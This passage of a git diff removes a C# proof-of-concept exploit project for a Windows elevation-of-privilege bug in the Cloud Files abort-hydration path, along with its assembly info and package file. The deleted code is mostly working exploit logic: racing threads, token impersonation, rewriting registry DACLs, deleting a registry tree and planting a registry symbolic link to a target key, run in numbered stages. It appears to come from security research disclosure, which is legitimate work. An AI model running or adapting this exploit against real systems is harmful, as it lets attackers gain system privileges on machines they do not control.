-        {
-            Thread check_key_th = new Thread(CheckKeyThread);
-            check_key_th.IsBackground = true;
-            check_key_th.Start(root_key);
-            Thread.Sleep(1000);
-
-            var th = NtThread.OpenCurrent();
-            var anon_thread = new Thread(ForceTokenThread)
-            {
-                IsBackground = true
-            };
-            anon_thread.Start(th);
-
-            while (true)
-            {
-                CfAbortOperation(NtProcess.Current.ProcessId,
-                    IntPtr.Zero, AbortHydrationFlags.Block);
-            }
-        }
-
-        static void Stage2()
-        {
-            using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
-            {
-                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
-                DeleteRegistryTree(key);
-            }
-
-            NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
-            Stage1(false);
-        }
-
-        static void Stage3()
-        {
-            using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
-            {
-                Console.WriteLine("Cleaning up link {0}", key.FullPath);
-                key.Delete();
-            }
-
-            using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
-            {
-                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
-            }
-        }
-
-        static void Main(string[] args)
-        {
-            try
-            {
-                CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
-
-                if (args.Length <= 1)
-                {
-                    int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
-                    switch (stage)
-                    {
-                        case 0:
-                            Stage0();
-                            break;
-                        case 1:
-                            Stage1(true);
-                            break;
-                        case 2:
-                            Stage2();
-                            break;
-                        case 3:
-                            Stage3();
-                            break;
-                        default:
-                            throw new ArgumentException("Erm?");
-                    }
-                }
-                else
-                {
-                    using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
-                    {
-                        using (var imp = token.Impersonate())
-                        {
-                            CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
-                        }
-                    }
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-    }
-}
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
deleted file mode 100644
index 6e2483f..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
+++ /dev/null
@@ -1,36 +0,0 @@
-using System.Reflection;
-using System.Runtime.CompilerServices;
-using System.Runtime.InteropServices;
-
-// General Information about an assembly is controlled through the following
-// set of attributes. Change these attribute values to modify the information
-// associated with an assembly.
-[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyDescription("")]
-[assembly: AssemblyConfiguration("")]
-[assembly: AssemblyCompany("")]
-[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyCopyright("Copyright ©  2020")]
-[assembly: AssemblyTrademark("")]
-[assembly: AssemblyCulture("")]
-
-// Setting ComVisible to false makes the types in this assembly not visible
-// to COM components.  If you need to access a type in this assembly from
-// COM, set the ComVisible attribute to true on that type.
-[assembly: ComVisible(false)]
-
-// The following GUID is for the ID of the typelib if this project is exposed to COM
-[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
-
-// Version information for an assembly consists of the following four values:
-//
-//      Major Version
-//      Minor Version
-//      Build Number
-//      Revision
-//
-// You can specify all the values or you can default the Build and Revision Numbers
-// by using the '*' as shown below:
-// [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.0.0.0")]
-[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
deleted file mode 100644
index f78d31a..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<packages>
-  <package id="NtApiDotNet" version="1.1.28" targetFramework="net472" />
-</packages>
\ No newline at end of file